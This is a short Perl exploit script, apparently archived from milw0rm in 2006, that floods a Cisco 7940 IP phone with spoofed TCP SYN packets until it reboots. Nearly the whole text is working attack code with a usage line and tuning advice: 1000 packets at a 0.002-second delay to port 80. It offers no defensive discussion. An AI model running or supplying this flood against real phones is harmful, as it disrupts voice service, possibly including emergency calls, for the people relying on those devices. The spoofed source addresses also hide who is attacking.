1 #!/usr/bin/perl
2 # This is made for trashing cisco 7940 ip phones. kokanin made/discovered this.
3 # A packetcount of 1000 and a packetdelay of 0.002 sent to port 80 makes my
4 # phone reboot − play with the settings and stuff. PRIVATE PRIVATE PRIVATE!!!
5 # not private anymore. Vulnerable phones are running ver. 7.0(2.0) using the skinny
6 # protocol − this is not for the SIP firmware.
7
8 use Net::RawIP;
9 use Time::HiRes;
10 $pkt = new Net::RawIP;
11 die "Usage $0 <src> <dst> <target port> <number of pkts> <packet delay>" unless ($ARGV[4]);
12 $pkt−>set({
13 ip => {
14 saddr => $ARGV[0],
15 daddr => $ARGV[1]
16 },
17 tcp=> { dest => $ARGV[2],
18 syn => 1,
19 seq => 0,
20 ack => 0}
21 });
22 for(1..$ARGV[3]){ $pkt−>set({tcp=>{source=>int(rand(65535))}});Time::HiRes::sleep($ARGV[4]); $pkt−>send; };
23
24 # milw0rm.com [2006−01−10]
Page 1/1
Cisco IP Phone 7940 Reboot Denial of Service Exploit
kokanin
01/10/2006